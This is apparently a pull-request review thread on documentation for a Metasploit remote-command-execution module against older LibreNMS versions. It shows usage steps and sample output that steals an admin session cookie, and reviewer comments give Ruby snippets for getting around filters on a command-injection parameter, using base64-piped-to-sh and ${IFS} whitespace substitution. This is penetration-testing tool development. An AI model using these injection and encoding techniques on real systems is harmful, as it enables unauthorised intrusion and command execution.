documentation/modules/exploit/multi/http/librenms_rce.md

```diff
@@ -0,0 +1,53 @@
+[LibreNMS](http://www.librenms.org) is Community-based GPL-licensed network monitoring system 
+
+## Vulnerable Application
+
+You can get the application on its [github](https://github.com/librenms/librenms),
+just make sure to get a version older than
+[1205f12f10a87f50a9a9127ab3caea861bff91b9](https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/librenms_rce`
+  4. Do: `set rport port`
+  5. Do: `set rhost ip`
+  6. Do: `set cmd id`
+  7. Do: `exploit`
+```
+ msf exploit(librenms_rce) > run
+[*] Getting admin cookie...
+[*] Got admin cookie: PHPSESSID=nmvg7q21egmrbg2enf27tjplt4;
+[*] Result of the command:
+uid=33(www-data) gid=33(www-data) groups=33(www-data),996(librenms)
+[*] Exploit completed, but no session was created.
+msf exploit(librenms_rce) > 
+```
+  9. You should get the admin cookie, and the result of your command.
+
+## Options
+
+  **TARGETURI**
+
+  TARGETURI by default is `/`, which is the common path for LibreNMS.
+  
+## Demonstration
```

Comment:
Can you provide example output of running this with a regular bind/reverse shell payload?

Although the `CMD` exploitation, and subsequent returning of the command results is cute, I suspect users will generally want to aim and fire a full-auto bind/reverse payload.

Reply:
It fails with something else than a `CMD`, I didn't managed to understand why :/

Reply:
Uh that's not good. The module should leverage existing metasploit payloads where possible. The raw `CMD` payloads are usually reserved for restricted environments such as embedded devices where gaining a shell is tricky, or as a nice-to-have addition to the regular payloads for execution of custom commands.

In this case, it's most likely due to a bad character, and based on your usage of `${IFS}` I would assume that whitespace is to blame.

To get around this, you could try specifying `\x20` as a bad character in `BadChars` and see if the payloads can automagically choose an appropriate encoder.

If the CMD payloads can't encode the payload, you could try encoding it yourself. Here's a couple of options:

```ruby
# Base64 encode the payload and pipe to /bin/sh
# - Note that this requires the base64 binary on the target host
# - Note that `base64 -d` is used, which only works on real operating systems. It won't work on Mac which uses `base64 --decode` or `base64 -D` or something else equally stupid.
custom_payload = "echo${IFS}#{Base64.strict_encode64(payload.encoded)}|base64${IFS}-d|/bin/sh"
# ...
'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
```

```ruby
# Replace all whitespace with ${IFS}
custom_payload = payload.encoded.to_s.gsub(/\s+/, "${IFS}")
# ...
'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
```